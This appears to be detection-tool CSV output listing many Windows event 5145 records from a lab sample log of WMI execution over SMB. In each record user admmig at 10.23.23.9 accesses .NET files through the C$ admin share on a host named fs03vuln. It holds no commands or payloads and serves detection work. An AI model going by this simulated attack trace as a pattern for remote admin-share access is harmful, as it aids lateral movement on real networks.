10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ddb52221ad0200b7c2e0a308e47d5c7c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\93aa8a60d293a05752aca14646afe6d2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\65b4d38e24dfdd935b19ba1de243c244 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.616 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#\20e180f5a613fa6fc6d2734676e45df9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#\c44a74a8e4b895c50ca0a52e97d6428a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\15e0783372e02bd437cab8ac76420124 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#\f7a43000e540605d6e0e171da4c2f1d4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#\d72f9f8f53d2cae7691f333739a06f37 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log\dbe5b3f92de7a1dc3900640c1907d600 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\4c22f9b9fda7e935d191dafdc77d9b1f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#\f16e228634f247a35562db6ee33649f3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management\d1e6b39e15536aaa5fb9b1cacf8b18aa : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging\0a331cd9fc9df7d44e898baf51e9e09e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net\61ed18221f09c6ff1b6071ff5a269d08 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#\4a545096f3372d1b7307ee8849058910 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5ba9e9e2d2253e30f3f28e12016e441d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\8e945b32dd6b4b00c900f6c01c0f3c62 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing\0f95ad97e3260801c998976fb3a0e0e1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#\4febdd9160ebfd86d00365dbdaca9054 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#\32aee6654d81a07e698f9ee18c886a2a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#\65e679add728957b62f4bbba59d88386 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\3e17b0be5e7a03853d44d996d366e88b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#\2abf386e286ec43711933fbe3e652014 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#\6ef9bbadb5c7087da45798a762683eeb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#\ed68489987b413410ccb94c6e704f6b4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.772 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\183eaaded316165bfbd32a991e4e8c8a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security\ba6ea4732f569e0674d6a43a82de5cc2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#\09e0258d6e4a9d467c32dc8ac58766f2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#\c97638c574cae07911907fa19e2aeedd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.803 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 